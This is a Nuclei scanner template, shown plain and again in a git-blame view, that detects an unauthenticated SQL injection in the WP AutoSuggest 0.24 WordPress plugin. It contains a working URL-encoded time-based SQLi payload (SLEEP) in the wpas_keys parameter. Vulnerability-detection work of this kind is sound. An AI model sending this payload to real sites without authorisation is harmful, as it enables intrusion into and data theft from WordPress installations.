nuclei-templates/http/vulnerabilities/wordpress/wp-autosuggest-sql-injectio...

id: wp-autosuggest-sql-injection

info:
  name: WP AutoSuggest 0.24 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9188
    - https://wordpress.org/plugins/wp-autosuggest/
  metadata:
    verified: true
    max-request: 1
  tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "<results>")'
        condition: and
# digest: 4b0a00483046022100b4f4ff6fb2239ec707657d1bc296a090c73b74dd6c3ff9527f28147b8a68a6c0022100b2d0fcb290a8d24083340cf31e35243ede7ef10dc17fe8f2d0569c575cdab3c1:922c64590222798bb761d5b6d8e72950
templates added 2023-05-06 12:12:20 +00:00			`id: wp-autosuggest-sql-injection`

			`info:`
			`name: WP AutoSuggest 0.24 - SQL Injection`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.`
			`reference:`
			`- https://wpscan.com/vulnerability/9188`
			`- https://wordpress.org/plugins/wp-autosuggest/`
			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
Auto Generated CVE annotations [Thu May 11 13:27:36 UTC 2023] :robot: 2023-05-11 13:27:36 +00:00			`tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress`
templates added 2023-05-06 12:12:20 +00:00
			`http:`
updated template format for sqli templates with timeout 2024-06-23 05:19:54 +00:00			`- raw:`
			`- \|`
			`@timeout: 20s`
			`GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1`
			`Host: {{Hostname}}`
templates added 2023-05-06 12:12:20 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration>=6'`
			`- 'status_code == 200'`
			`- 'contains(content_type, "text/xml")'`
			`- 'contains(body, "<results>")'`
			`condition: and`
Auto Template Signing [Tue Jun 25 10:24:38 UTC 2024] :robot: 2024-06-25 10:24:38 +00:00			`# digest: 4b0a00483046022100b4f4ff6fb2239ec707657d1bc296a090c73b74dd6c3ff9527f28147b8a68a6c0022100b2d0fcb290a8d24083340cf31e35243ede7ef10dc17fe8f2d0569c575cdab3c1:922c64590222798bb761d5b6d8e72950`